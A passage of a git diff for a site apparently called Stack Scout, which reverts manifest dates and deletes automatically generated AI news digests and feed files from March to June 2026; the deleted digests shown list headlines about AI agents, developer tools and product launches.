------------- data/digest-2026-05-15.md | 123 ------------- data/digest-2026-05-16.md | 123 ------------- data/digest-2026-05-17.md | 125 ------------- data/digest-2026-05-18.md | 125 ------------- data/digest-2026-05-19.md | 117 ------------ data/digest-2026-05-20.md | 107 ----------- data/digest-2026-05-21.md | 119 ------------ data/digest-2026-05-22.md | 117 ------------ data/digest-2026-05-23.md | 121 ------------ data/digest-2026-05-24.md | 125 ------------- data/digest-2026-05-25.md | 123 ------------- data/digest-2026-05-26.md | 121 ------------ data/digest-2026-05-27.md | 123 ------------- data/digest-2026-05-28.md | 121 ------------ data/digest-2026-05-29.md | 111 ----------- data/digest-2026-05-30.md | 103 ----------- data/digest-2026-05-31.md | 11 -- 
data/digest-2026-06-01.md | 35 ---- data/digest-2026-06-02.md | 29 --- data/digest-2026-06-03.md | 41 ----- data/digest-2026-06-04.md | 35 ---- data/digest-2026-06-05.md | 35 ---- data/digest-2026-06-06.md | 5 - data/methodology-manifest.json | 4 +- data/news-feed-2026-03-15.json | 55 ------ data/news-feed-2026-03-16.json | 134 -------------- data/news-feed-2026-03-17.json | 237 ------------------------ data/news-feed-2026-03-18.json | 160 ---------------- data/news-feed-2026-03-19.json | 87 --------- data/news-feed-2026-03-20.json | 102 ----------- data/news-feed-2026-03-21.json | 115 ------------ data/news-feed-2026-03-22.json | 115 ------------ data/news-feed-2026-03-23.json | 55 ------ data/news-feed-2026-03-24.json | 145 --------------- data/news-feed-2026-03-25.json | 115 ------------ data/news-feed-2026-03-26.json | 119 ------------ data/news-feed-2026-03-27.json | 87 --------- data/news-feed-2026-03-28.json | 70 ------- data/news-feed-2026-03-29.json | 55 ------ data/news-feed-2026-03-30.json | 40 ---- data/news-feed-2026-03-31.json | 271 --------------------------- data/news-feed-2026-04-01.json | 253 -------------------------- data/news-feed-2026-04-02.json | 181 ------------------ data/news-feed-2026-04-03.json | 119 ------------ data/news-feed-2026-04-04.json | 87 --------- data/news-feed-2026-04-05.json | 261 -------------------------- data/news-feed-2026-04-06.json | 263 --------------------------- data/news-feed-2026-04-07.json | 253 -------------------------- data/news-feed-2026-04-08.json | 269 --------------------------- data/news-feed-2026-04-09.json | 253 -------------------------- data/news-feed-2026-04-10.json | 245 ------------------------- data/news-feed-2026-04-11.json | 249 ------------------------- data/news-feed-2026-04-12.json | 168 ----------------- data/news-feed-2026-04-14.json | 255 -------------------------- data/news-feed-2026-04-15.json | 255 -------------------------- data/news-feed-2026-04-16.json | 259 
-------------------------- data/news-feed-2026-04-17.json | 263 --------------------------- data/news-feed-2026-04-18.json | 249 ------------------------- data/news-feed-2026-04-19.json | 245 ------------------------- data/news-feed-2026-04-20.json | 251 ------------------------- data/news-feed-2026-04-21.json | 261 -------------------------- data/news-feed-2026-04-22.json | 247 ------------------------- data/news-feed-2026-04-23.json | 207 --------------------- data/news-feed-2026-04-25.json | 249 ------------------------- data/news-feed-2026-04-26.json | 265 --------------------------- data/news-feed-2026-04-27.json | 263 --------------------------- data/news-feed-2026-04-28.json | 269 --------------------------- data/news-feed-2026-04-29.json | 265 --------------------------- data/news-feed-2026-04-30.json | 255 -------------------------- data/news-feed-2026-05-01.json | 265 --------------------------- data/news-feed-2026-05-02.json | 273 ---------------------------- data/news-feed-2026-05-03.json | 247 ------------------------- data/news-feed-2026-05-04.json | 263 --------------------------- data/news-feed-2026-05-05.json | 269 --------------------------- data/news-feed-2026-05-06.json | 263 --------------------------- data/news-feed-2026-05-07.json | 263 --------------------------- data/news-feed-2026-05-08.json | 261 -------------------------- data/news-feed-2026-05-09.json | 257 -------------------------- data/news-feed-2026-05-10.json | 253 -------------------------- data/news-feed-2026-05-11.json | 263 --------------------------- data/news-feed-2026-05-12.json | 259 -------------------------- data/news-feed-2026-05-13.json | 277 ---------------------------- data/news-feed-2026-05-14.json | 277 ---------------------------- data/news-feed-2026-05-15.json | 259 -------------------------- data/news-feed-2026-05-16.json | 275 ---------------------------- data/news-feed-2026-05-17.json | 267 --------------------------- data/news-feed-2026-05-18.json | 273 
---------------------------- data/news-feed-2026-05-19.json | 275 ---------------------------- data/news-feed-2026-05-20.json | 261 -------------------------- data/news-feed-2026-05-21.json | 277 ---------------------------- data/news-feed-2026-05-22.json | 257 -------------------------- data/news-feed-2026-05-23.json | 251 ------------------------- data/news-feed-2026-05-24.json | 269 --------------------------- data/news-feed-2026-05-25.json | 279 ---------------------------- data/news-feed-2026-05-26.json | 283 ----------------------------- data/news-feed-2026-05-27.json | 265 --------------------------- data/news-feed-2026-05-28.json | 271 --------------------------- data/news-feed-2026-05-29.json | 259 -------------------------- data/news-feed-2026-05-30.json | 243 ------------------------- data/news-feed-2026-05-31.json | 25 --- data/news-feed-2026-06-01.json | 85 --------- data/news-feed-2026-06-02.json | 72 -------- data/news-feed-2026-06-03.json | 102 ----------- data/news-feed-2026-06-04.json | 86 --------- data/news-feed-2026-06-05.json | 84 --------- data/news-feed-2026-06-06.json | 6 - data/news-feed-latest.json | 6 - data/page-registry.json | 2 +- data/radar-manifest.json | 4 +- data/tools-manifest.json | 4 +- data/updates-manifest.json | 4 +- index.html | 2 +- method/index.html | 2 +- radar/index.html | 2 +- scripts/build-stackscout.js | 16 -- service-worker.js | 2 +- tools/anthropic-api/index.html | 2 +- tools/canvas-planner/index.html | 2 +- tools/gh-cli/index.html | 2 +- tools/github-mcp-server/index.html | 2 +- tools/hugging-face/index.html | 2 +- tools/make/index.html | 2 +- tools/n8n/index.html | 2 +- tools/openai-api/index.html | 2 +- tools/perplexity/index.html | 2 +- tools/playwright-mcp/index.html | 2 +- tools/signal-stack/index.html | 2 +- tools/strudel-studio/index.html | 2 +- tools/syncpad/index.html | 2 +- tools/wrangler/index.html | 2 +- updates/index.html | 2 +- 202 files changed, 42 insertions(+), 24944 deletions(-) delete mode 
100644 data/digest-2026-03-15.md delete mode 100644 data/digest-2026-03-16.md delete mode 100644 data/digest-2026-03-17.md delete mode 100644 data/digest-2026-03-18.md delete mode 100644 data/digest-2026-03-19.md delete mode 100644 data/digest-2026-03-20.md delete mode 100644 data/digest-2026-03-21.md delete mode 100644 data/digest-2026-03-22.md delete mode 100644 data/digest-2026-03-23.md delete mode 100644 data/digest-2026-03-24.md delete mode 100644 data/digest-2026-03-25.md delete mode 100644 data/digest-2026-03-26.md delete mode 100644 data/digest-2026-03-27.md delete mode 100644 data/digest-2026-03-28.md delete mode 100644 data/digest-2026-03-29.md delete mode 100644 data/digest-2026-03-30.md delete mode 100644 data/digest-2026-03-31.md delete mode 100644 data/digest-2026-04-01.md delete mode 100644 data/digest-2026-04-02.md delete mode 100644 data/digest-2026-04-03.md delete mode 100644 data/digest-2026-04-04.md delete mode 100644 data/digest-2026-04-05.md delete mode 100644 data/digest-2026-04-06.md delete mode 100644 data/digest-2026-04-07.md delete mode 100644 data/digest-2026-04-08.md delete mode 100644 data/digest-2026-04-09.md delete mode 100644 data/digest-2026-04-10.md delete mode 100644 data/digest-2026-04-11.md delete mode 100644 data/digest-2026-04-12.md delete mode 100644 data/digest-2026-04-14.md delete mode 100644 data/digest-2026-04-15.md delete mode 100644 data/digest-2026-04-16.md delete mode 100644 data/digest-2026-04-17.md delete mode 100644 data/digest-2026-04-18.md delete mode 100644 data/digest-2026-04-19.md delete mode 100644 data/digest-2026-04-20.md delete mode 100644 data/digest-2026-04-21.md delete mode 100644 data/digest-2026-04-22.md delete mode 100644 data/digest-2026-04-23.md delete mode 100644 data/digest-2026-04-25.md delete mode 100644 data/digest-2026-04-26.md delete mode 100644 data/digest-2026-04-27.md delete mode 100644 data/digest-2026-04-28.md delete mode 100644 data/digest-2026-04-29.md delete mode 100644 
data/digest-2026-04-30.md delete mode 100644 data/digest-2026-05-01.md delete mode 100644 data/digest-2026-05-02.md delete mode 100644 data/digest-2026-05-03.md delete mode 100644 data/digest-2026-05-04.md delete mode 100644 data/digest-2026-05-05.md delete mode 100644 data/digest-2026-05-06.md delete mode 100644 data/digest-2026-05-07.md delete mode 100644 data/digest-2026-05-08.md delete mode 100644 data/digest-2026-05-09.md delete mode 100644 data/digest-2026-05-10.md delete mode 100644 data/digest-2026-05-11.md delete mode 100644 data/digest-2026-05-12.md delete mode 100644 data/digest-2026-05-13.md delete mode 100644 data/digest-2026-05-14.md delete mode 100644 data/digest-2026-05-15.md delete mode 100644 data/digest-2026-05-16.md delete mode 100644 data/digest-2026-05-17.md delete mode 100644 data/digest-2026-05-18.md delete mode 100644 data/digest-2026-05-19.md delete mode 100644 data/digest-2026-05-20.md delete mode 100644 data/digest-2026-05-21.md delete mode 100644 data/digest-2026-05-22.md delete mode 100644 data/digest-2026-05-23.md delete mode 100644 data/digest-2026-05-24.md delete mode 100644 data/digest-2026-05-25.md delete mode 100644 data/digest-2026-05-26.md delete mode 100644 data/digest-2026-05-27.md delete mode 100644 data/digest-2026-05-28.md delete mode 100644 data/digest-2026-05-29.md delete mode 100644 data/digest-2026-05-30.md delete mode 100644 data/digest-2026-05-31.md delete mode 100644 data/digest-2026-06-01.md delete mode 100644 data/digest-2026-06-02.md delete mode 100644 data/digest-2026-06-03.md delete mode 100644 data/digest-2026-06-04.md delete mode 100644 data/digest-2026-06-05.md delete mode 100644 data/digest-2026-06-06.md delete mode 100644 data/news-feed-2026-03-15.json delete mode 100644 data/news-feed-2026-03-16.json delete mode 100644 data/news-feed-2026-03-17.json delete mode 100644 data/news-feed-2026-03-18.json delete mode 100644 data/news-feed-2026-03-19.json delete mode 100644 data/news-feed-2026-03-20.json delete 
mode 100644 data/news-feed-2026-03-21.json delete mode 100644 data/news-feed-2026-03-22.json delete mode 100644 data/news-feed-2026-03-23.json delete mode 100644 data/news-feed-2026-03-24.json delete mode 100644 data/news-feed-2026-03-25.json delete mode 100644 data/news-feed-2026-03-26.json delete mode 100644 data/news-feed-2026-03-27.json delete mode 100644 data/news-feed-2026-03-28.json delete mode 100644 data/news-feed-2026-03-29.json delete mode 100644 data/news-feed-2026-03-30.json delete mode 100644 data/news-feed-2026-03-31.json delete mode 100644 data/news-feed-2026-04-01.json delete mode 100644 data/news-feed-2026-04-02.json delete mode 100644 data/news-feed-2026-04-03.json delete mode 100644 data/news-feed-2026-04-04.json delete mode 100644 data/news-feed-2026-04-05.json delete mode 100644 data/news-feed-2026-04-06.json delete mode 100644 data/news-feed-2026-04-07.json delete mode 100644 data/news-feed-2026-04-08.json delete mode 100644 data/news-feed-2026-04-09.json delete mode 100644 data/news-feed-2026-04-10.json delete mode 100644 data/news-feed-2026-04-11.json delete mode 100644 data/news-feed-2026-04-12.json delete mode 100644 data/news-feed-2026-04-14.json delete mode 100644 data/news-feed-2026-04-15.json delete mode 100644 data/news-feed-2026-04-16.json delete mode 100644 data/news-feed-2026-04-17.json delete mode 100644 data/news-feed-2026-04-18.json delete mode 100644 data/news-feed-2026-04-19.json delete mode 100644 data/news-feed-2026-04-20.json delete mode 100644 data/news-feed-2026-04-21.json delete mode 100644 data/news-feed-2026-04-22.json delete mode 100644 data/news-feed-2026-04-23.json delete mode 100644 data/news-feed-2026-04-25.json delete mode 100644 data/news-feed-2026-04-26.json delete mode 100644 data/news-feed-2026-04-27.json delete mode 100644 data/news-feed-2026-04-28.json delete mode 100644 data/news-feed-2026-04-29.json delete mode 100644 data/news-feed-2026-04-30.json delete mode 100644 data/news-feed-2026-05-01.json delete 
mode 100644 data/news-feed-2026-05-02.json delete mode 100644 data/news-feed-2026-05-03.json delete mode 100644 data/news-feed-2026-05-04.json delete mode 100644 data/news-feed-2026-05-05.json delete mode 100644 data/news-feed-2026-05-06.json delete mode 100644 data/news-feed-2026-05-07.json delete mode 100644 data/news-feed-2026-05-08.json delete mode 100644 data/news-feed-2026-05-09.json delete mode 100644 data/news-feed-2026-05-10.json delete mode 100644 data/news-feed-2026-05-11.json delete mode 100644 data/news-feed-2026-05-12.json delete mode 100644 data/news-feed-2026-05-13.json delete mode 100644 data/news-feed-2026-05-14.json delete mode 100644 data/news-feed-2026-05-15.json delete mode 100644 data/news-feed-2026-05-16.json delete mode 100644 data/news-feed-2026-05-17.json delete mode 100644 data/news-feed-2026-05-18.json delete mode 100644 data/news-feed-2026-05-19.json delete mode 100644 data/news-feed-2026-05-20.json delete mode 100644 data/news-feed-2026-05-21.json delete mode 100644 data/news-feed-2026-05-22.json delete mode 100644 data/news-feed-2026-05-23.json delete mode 100644 data/news-feed-2026-05-24.json delete mode 100644 data/news-feed-2026-05-25.json delete mode 100644 data/news-feed-2026-05-26.json delete mode 100644 data/news-feed-2026-05-27.json delete mode 100644 data/news-feed-2026-05-28.json delete mode 100644 data/news-feed-2026-05-29.json delete mode 100644 data/news-feed-2026-05-30.json delete mode 100644 data/news-feed-2026-05-31.json delete mode 100644 data/news-feed-2026-06-01.json delete mode 100644 data/news-feed-2026-06-02.json delete mode 100644 data/news-feed-2026-06-03.json delete mode 100644 data/news-feed-2026-06-04.json delete mode 100644 data/news-feed-2026-06-05.json delete mode 100644 data/news-feed-2026-06-06.json delete mode 100644 data/news-feed-latest.json diff --git a/catalog/index.html b/catalog/index.html index 7d20915..6afa345 100644 --- a/catalog/index.html +++ b/catalog/index.html @@ -676,7 +676,7 @@

          SyncPad

          diff --git a/categories/apis/index.html b/categories/apis/index.html index b12e7da..4175a4c 100644 --- a/categories/apis/index.html +++ b/categories/apis/index.html @@ -175,7 +175,7 @@

          Anthropic API

          diff --git a/categories/clis/index.html b/categories/clis/index.html index aaabad1..81b6211 100644 --- a/categories/clis/index.html +++ b/categories/clis/index.html @@ -175,7 +175,7 @@

          Wrangler

          diff --git a/categories/desktop-apps/index.html b/categories/desktop-apps/index.html index 4df671e..c98a026 100644 --- a/categories/desktop-apps/index.html +++ b/categories/desktop-apps/index.html @@ -141,7 +141,7 @@

          SyncPad

          diff --git a/categories/index.html b/categories/index.html index 64bb4cf..c9acbbd 100644 --- a/categories/index.html +++ b/categories/index.html @@ -228,7 +228,7 @@

          Desktop Apps

          diff --git a/categories/mcps/index.html b/categories/mcps/index.html index 30e54c8..f862d74 100644 --- a/categories/mcps/index.html +++ b/categories/mcps/index.html @@ -175,7 +175,7 @@

          Playwright MCP

          diff --git a/categories/web-apps/index.html b/categories/web-apps/index.html index c35f706..cb3bc04 100644 --- a/categories/web-apps/index.html +++ b/categories/web-apps/index.html @@ -209,7 +209,7 @@

          Strudel Studio

          diff --git a/categories/web-services/index.html b/categories/web-services/index.html index 15036a9..cf70f1a 100644 --- a/categories/web-services/index.html +++ b/categories/web-services/index.html @@ -175,7 +175,7 @@

          Make

          diff --git a/categories/websites/index.html b/categories/websites/index.html index 1c17ed0..999627d 100644 --- a/categories/websites/index.html +++ b/categories/websites/index.html @@ -175,7 +175,7 @@

          Hugging Face

          diff --git a/collections/index.html b/collections/index.html index c24ecb3..ae64571 100644 --- a/collections/index.html +++ b/collections/index.html @@ -175,7 +175,7 @@

          From the Stack Scout Lab

          diff --git a/data/categories-manifest.json b/data/categories-manifest.json index 0e2dc9c..78826b4 100644 --- a/data/categories-manifest.json +++ b/data/categories-manifest.json @@ -1,7 +1,7 @@ { "title": "Stack Scout // Categories", - "generatedAt": "2026-06-06", - "updatedAt": "2026-06-06", + "generatedAt": "2026-06-04", + "updatedAt": "2026-06-04", "categories": [ { "slug": "websites", diff --git a/data/collections-manifest.json b/data/collections-manifest.json index 871d976..c6f8013 100644 --- a/data/collections-manifest.json +++ b/data/collections-manifest.json @@ -1,7 +1,7 @@ { "title": "Stack Scout // Collections", - "generatedAt": "2026-06-06", - "updatedAt": "2026-06-06", + "generatedAt": "2026-06-04", + "updatedAt": "2026-06-04", "collections": [ { "slug": "creator-stack", diff --git a/data/digest-2026-03-15.md b/data/digest-2026-03-15.md deleted file mode 100644 index 0386265..0000000 --- a/data/digest-2026-03-15.md +++ /dev/null @@ -1,23 +0,0 @@ -# Stack Scout - AI News Digest -**2026-03-15** | 3 stories | Auto-generated from 55 archived stories - ---- - -## [Show HN: Open-source playground to red-team AI agents with exploits published](https://github.com/fabraix/playground) -*Hacker News* | 15/03/2026 | Score: 0.88 -Tags: open_source - ---- - -## [Chrome DevTools MCP (2025)](https://developer.chrome.com/blog/chrome-devtools-mcp-debug-your-browser-session) -*Hacker News* | 15/03/2026 | Score: 0.81 -Tags: mcp - ---- - -## [Office.eu launches as Europe's sovereign office platform](https://office.eu/media/pressrelease-20260304) -*Hacker News* | 15/03/2026 | Score: 0.76 -Tags: product_launch - ---- - diff --git a/data/digest-2026-03-16.md b/data/digest-2026-03-16.md deleted file mode 100644 index 3d9554c..0000000 --- a/data/digest-2026-03-16.md +++ /dev/null @@ -1,53 +0,0 @@ -# Stack Scout - AI News Digest -**2026-03-16** | 8 stories | Auto-generated from 67 archived stories - ---- - -## [Apideck CLI – An AI-agent interface with much lower context 
consumption than MCP](https://www.apideck.com/blog/mcp-server-eating-context-window-cli-alternative) -*Hacker News* | 16/03/2026 | Score: 1.00 -Tags: mcp, cli_tool, agent_tool - ---- - -## [Speed at the cost of quality: Study of use of Cursor AI in open source projects](https://arxiv.org/abs/2511.04427) -*Hacker News* | 16/03/2026 | Score: 0.87 -Tags: open_source - ---- - -## [Nvidia Launches Vera CPU, Purpose-Built for Agentic AI](https://nvidianews.nvidia.com/news/nvidia-launches-vera-cpu-purpose-built-for-agentic-ai) -*Hacker News* | 16/03/2026 | Score: 0.84 -Tags: product_launch - ---- - -## [Nango (YC W23, API Access for Agents and Apps) Is Hiring](https://jobs.ashbyhq.com/Nango) -*Hacker News* | 16/03/2026 | Score: 0.82 -Tags: api_update - ---- - -## [SpiceCrypt: A Python library for decrypting LTspice encrypted model files](https://github.com/jtsylve/spice-crypt) -*Hacker News* | 15/03/2026 | Score: 0.76 -Tags: developer_tool - ---- - -## [Event Publisher enables event integration between Keycloak and OpenFGA](https://github.com/embesozzi/keycloak-openfga-event-publisher) -*Hacker News* | 16/03/2026 | Score: 0.70 -Tags: tool_update - ---- - -## [Lazycut: A simple terminal video trimmer using FFmpeg](https://github.com/emin-ozata/lazycut) -*Hacker News* | 16/03/2026 | Score: 0.70 -Tags: cli_tool - ---- - -## [Leanstral: Open-source agent for trustworthy coding and formal proof engineering](https://mistral.ai/news/leanstral) -*Hacker News* | 16/03/2026 | Score: 0.68 -Tags: open_source - ---- - diff --git a/data/digest-2026-03-17.md b/data/digest-2026-03-17.md deleted file mode 100644 index 8ea14b8..0000000 --- a/data/digest-2026-03-17.md +++ /dev/null @@ -1,107 +0,0 @@ -# Stack Scout - AI News Digest -**2026-03-17** | 15 stories | Auto-generated from 140 archived stories - ---- - -## [Show HN: Crust – A CLI framework for TypeScript and Bun](https://github.com/chenxin-yan/crust) -*Hacker News* | 17/03/2026 | Score: 0.84 -Tags: developer_tool, cli_tool - ---- - 
-## [World launches tool to verify humans behind AI shopping agents](https://techcrunch.com/2026/03/17/world-launches-tool-to-verify-humans-behind-ai-shopping-agents/) -*TechCrunch AI* | 17/03/2026 | Score: 1.00 -Tags: product_launch - -> As AI agents take the reins for online shoppers, Sam Altman's unconventional startup is looking to expand its verification offerings to support agentic commerce. - ---- - -## [Picsart now allows creators to ‘hire’ AI assistants through agent marketplace](https://techcrunch.com/2026/03/16/picsart-now-allows-creators-to-hire-ai-assistants-through-agent-marketplace/) -*TechCrunch AI* | 17/03/2026 | Score: 1.00 -Tags: agent_tool - -> Picsart's AI agent marketplace will launch with four agents, then add more agents each week. - ---- - -## [Nvidia’s version of OpenClaw could solve its biggest problem: security](https://techcrunch.com/2026/03/16/nvidias-version-of-openclaw-could-solve-its-biggest-problem-security/) -*TechCrunch AI* | 16/03/2026 | Score: 1.00 -Tags: agent_tool - -> Nvidia announced an open enterprise AI agent platform, called NemoClaw, that is built off of viral OpenClaw. - ---- - -## [How to watch Jensen Huang’s Nvidia GTC 2026 keynote — and what to expect](https://techcrunch.com/2026/03/16/nvidia-gtc-how-to-watch-jensen-huang-2026-keynote/) -*TechCrunch AI* | 16/03/2026 | Score: 1.00 -Tags: product_launch - -> GTC is Nvidia's flagship annual event, where the chipmaker typically announces new products, partnerships, and its vision for the future of computing. Huang's keynote will focus on Nvidia's role in the future of computing and AI. - ---- - -## [China’s OpenClaw Boom Is a Gold Rush for AI Companies](https://www.wired.com/story/china-is-going-all-in-on-openclaw/) -*Wired AI* | 13/03/2026 | Score: 0.91 -Tags: open_source - -> Hype around the open source agent is driving people to rent cloud servers and buy AI subscriptions just to try it, creating a windfall for tech companies. 
- ---- - -## [Mistral AI Releases Forge](https://mistral.ai/news/forge) -*Hacker News* | 17/03/2026 | Score: 0.79 -Tags: product_launch - ---- - -## [Show HN: Horizon – GPU-accelerated infinite-canvas terminal in Rust](https://github.com/peters/horizon) -*Hacker News* | 17/03/2026 | Score: 0.78 -Tags: cli_tool - ---- - -## [Chrome extension adjusts video speed based on how fast the speaker is talking](https://github.com/ywong137/speech-speed) -*Hacker News* | 13/03/2026 | Score: 0.78 -Tags: developer_tool - ---- - -## [Retraction: After a routine code rejection, an AI agent published a hit piece on someone by name](https://arstechnica.com/ai/2026/02/after-a-routine-code-rejection-an-ai-agent-published-a-hit-piece-on-someone-by-name/) -*Ars Technica AI* | 13/02/2026 | Score: 0.78 -Tags: agent_tool - -> This story has been retracted - ---- - -## [Node.js needs a virtual file system](https://blog.platformatic.dev/why-nodejs-needs-a-virtual-file-system) -*Hacker News* | 17/03/2026 | Score: 0.70 -Tags: cli_tool - ---- - -## [Kagi Translate now supports LinkedIn Speak as an output language](https://translate.kagi.com/?from=en&to=LinkedIn+speak) -*Hacker News* | 17/03/2026 | Score: 0.70 -Tags: tool_update - ---- - -## [Reverse-engineering Viktor and making it Open Source](https://matijacniacki.com/blog/openviktor) -*Hacker News* | 17/03/2026 | Score: 0.68 -Tags: open_source - ---- - -## [Building a Shell](https://healeycodes.com/building-a-shell) -*Hacker News* | 17/03/2026 | Score: 0.62 -Tags: cli_tool - ---- - -## [Show HN: Droeftoeter, a Terminal Coding Toy](https://github.com/whtspc/droeftoeter) -*Hacker News* | 13/03/2026 | Score: 0.62 -Tags: cli_tool - ---- - diff --git a/data/digest-2026-03-18.md b/data/digest-2026-03-18.md deleted file mode 100644 index b931e5a..0000000 --- a/data/digest-2026-03-18.md +++ /dev/null @@ -1,71 +0,0 @@ -# Stack Scout - AI News Digest -**2026-03-18** | 10 stories | Auto-generated from 90 archived stories - ---- - -## [The leaderboard 
“you can’t game,” funded by the companies it ranks](https://techcrunch.com/video/the-leaderboard-you-cant-game-funded-by-the-companies-it-ranks/) -*TechCrunch AI* | 18/03/2026 | Score: 1.00 -Tags: product_launch - -> Artificial intelligence models are multiplying fast, and competition is stiff. With so many players crowding the space, which one will be the best — and who decides that? Arena, formerly LM Arena, has emerged as the de facto public leaderboard for frontier LLMs, influencing funding, launches, and PR cycles. In just seven months, the startup went from a UC Berkeley PhD research […] - ---- - -## [The PhD students who became the judges of the AI industry](https://techcrunch.com/podcast/the-phd-students-who-became-the-judges-of-the-ai-industry/) -*TechCrunch AI* | 18/03/2026 | Score: 1.00 -Tags: product_launch - -> Artificial intelligence models are multiplying fast, and competition is stiff. With so many players crowding the space, which one will be the best — and who decides that? Arena, formerly LM Arena, has emerged as the de facto public leaderboard for frontier LLMs, influencing funding, launches, and PR cycles. In just seven months, the startup went from a UC Berkeley PhD research […] - ---- - -## [Meta is having trouble with rogue AI agents](https://techcrunch.com/2026/03/18/meta-is-having-trouble-with-rogue-ai-agents/) -*TechCrunch AI* | 18/03/2026 | Score: 0.99 -Tags: agent_tool - -> A rogue AI agent inadvertently exposed Meta company and user data to engineers who didn't have permission to see it. 
- ---- - -## [Launch an autonomous AI agent with sandboxed execution in 2 lines of code](https://amaiya.github.io/onprem/examples_agent.html) -*Hacker News* | 18/03/2026 | Score: 0.98 -Tags: agent_tool - ---- - -## [Nightingale – open-source karaoke app that works with any song on your computer](https://nightingale.cafe/) -*Hacker News* | 18/03/2026 | Score: 0.76 -Tags: open_source - ---- - -## [A ngrok-style secure tunnel server written in Rust and Open Source](https://github.com/joaoh82/rustunnel) -*Hacker News* | 18/03/2026 | Score: 0.71 -Tags: open_source - ---- - -## [Show HN: Tmux-IDE, OSS agent-first terminal IDE](https://tmux.thijsverreck.com) -*Hacker News* | 18/03/2026 | Score: 0.70 -Tags: cli_tool - ---- - -## [Show HN: Pgit – A Git-like CLI backed by PostgreSQL](https://oseifert.ch/blog/building-pgit) -*Hacker News* | 17/03/2026 | Score: 0.70 -Tags: cli_tool - ---- - -## [Show HN: Hacker News archive (47M+ items, 11.6GB) as Parquet, updated every 5m](https://huggingface.co/datasets/open-index/hacker-news) -*Hacker News* | 14/03/2026 | Score: 0.70 -Tags: tool_update - ---- - -## [Measuring progress toward AGI: A cognitive framework](https://blog.google/innovation-and-ai/models-and-research/google-deepmind/measuring-agi-cognitive-framework/) -*Hacker News* | 18/03/2026 | Score: 0.61 -Tags: developer_tool - ---- - diff --git a/data/digest-2026-03-19.md b/data/digest-2026-03-19.md deleted file mode 100644 index 4b8563a..0000000 --- a/data/digest-2026-03-19.md +++ /dev/null @@ -1,39 +0,0 @@ -# Stack Scout - AI News Digest -**2026-03-19** | 5 stories | Auto-generated from 98 archived stories - ---- - -## [Multiverse Computing pushes its compressed AI models into the mainstream](https://techcrunch.com/2026/03/19/multiverse-computing-pushes-its-compressed-ai-models-into-the-mainstream/) -*TechCrunch AI* | 19/03/2026 | Score: 1.00 -Tags: api_update, tool_update - -> After compressing models from major AI labs, including OpenAI, Meta, DeepSeek, and Mistral AI, 
Multiverse Computing has launched both an app that showcases the capabilities of its compressed models and an API that makes them more widely available. - ---- - -## [DoorDash launches a new ‘Tasks’ app that pays couriers to submit videos to train AI](https://techcrunch.com/2026/03/19/doordash-launches-a-new-tasks-app-that-pays-couriers-to-submit-videos-to-train-ai/) -*TechCrunch AI* | 19/03/2026 | Score: 0.91 -Tags: product_launch - -> Delivery couriers will be able to earn money by completing activities like filming everyday tasks or recording themselves speaking in another language. - ---- - -## [Hyper-optimized reverse geocoding API](https://github.com/traccar/traccar-geocoder) -*Hacker News* | 19/03/2026 | Score: 0.76 -Tags: api_update - ---- - -## [Framework doesn't matter](https://cemrehancavdar.com/2026/02/19/your-framework-may-not-matter/) -*Hacker News* | 14/03/2026 | Score: 0.76 -Tags: developer_tool - ---- - -## [Cook: A simple CLI for orchestrating Claude Code](https://rjcorwin.github.io/cook/) -*Hacker News* | 19/03/2026 | Score: 0.65 -Tags: cli_tool - ---- - diff --git a/data/digest-2026-03-20.md b/data/digest-2026-03-20.md deleted file mode 100644 index 1330ddd..0000000 --- a/data/digest-2026-03-20.md +++ /dev/null @@ -1,45 +0,0 @@ -# Stack Scout - AI News Digest -**2026-03-20** | 6 stories | Auto-generated from 82 archived stories - ---- - -## [OpenCode – Open source AI coding agent](https://opencode.ai/) -*Hacker News* | 20/03/2026 | Score: 0.76 -Tags: open_source, agent_tool - ---- - -## [My AI Agent ‘Cofounder’ Conquered LinkedIn. Then It Got Banned](https://www.wired.com/story/linkedin-invited-my-ai-cofounder-to-give-a-corporate-talk-then-banned-it/) -*Wired AI* | 20/03/2026 | Score: 1.00 -Tags: agent_tool - -> When social media is constantly pushing people to use AI, why not let AI agents participate? 
- ---- - -## [Trump’s AI framework targets state laws, shifts child safety burden to parents](https://techcrunch.com/2026/03/20/trumps-ai-framework-targets-state-laws-shifts-child-safety-burden-to-parents/) -*TechCrunch AI* | 20/03/2026 | Score: 0.91 -Tags: developer_tool - -> Trump’s AI framework pushes federal preemption of state laws, emphasizes innovation, and shifts responsibility for child safety toward parents while laying out lighter-touch rules for tech companies. - ---- - -## [Show HN: We built a terminal-only Bluesky / AT Proto client written in Fortran](https://github.com/FormerLab/fortransky) -*Hacker News* | 20/03/2026 | Score: 0.70 -Tags: cli_tool - ---- - -## [Show HN: Sonar – A tiny CLI to see and kill whatever's running on localhost](https://github.com/RasKrebs/sonar) -*Hacker News* | 20/03/2026 | Score: 0.70 -Tags: cli_tool - ---- - -## [Show HN: An open-source safety net for home hemodialysis](https://safehemo.com/) -*Hacker News* | 17/03/2026 | Score: 0.68 -Tags: open_source - ---- - diff --git a/data/digest-2026-03-21.md b/data/digest-2026-03-21.md deleted file mode 100644 index 3e8826b..0000000 --- a/data/digest-2026-03-21.md +++ /dev/null @@ -1,49 +0,0 @@ -# Stack Scout - AI News Digest -**2026-03-21** | 7 stories | Auto-generated from 80 archived stories - ---- - -## [Apple Announces New Mac Sales Record Following MacBook Neo Launch](https://www.macrumors.com/2026/03/20/apple-shares-mac-sales-achievement/) -*Hacker News* | 21/03/2026 | Score: 0.90 -Tags: product_launch - ---- - -## [Mamba-3](https://www.together.ai/blog/mamba-3) -*Hacker News* | 17/03/2026 | Score: 0.87 -Tags: open_source - -> Meet Mamba-3: the SSM built for inference. Faster than Transformers at decode, stronger than Mamba-2, and open-source from day one. 
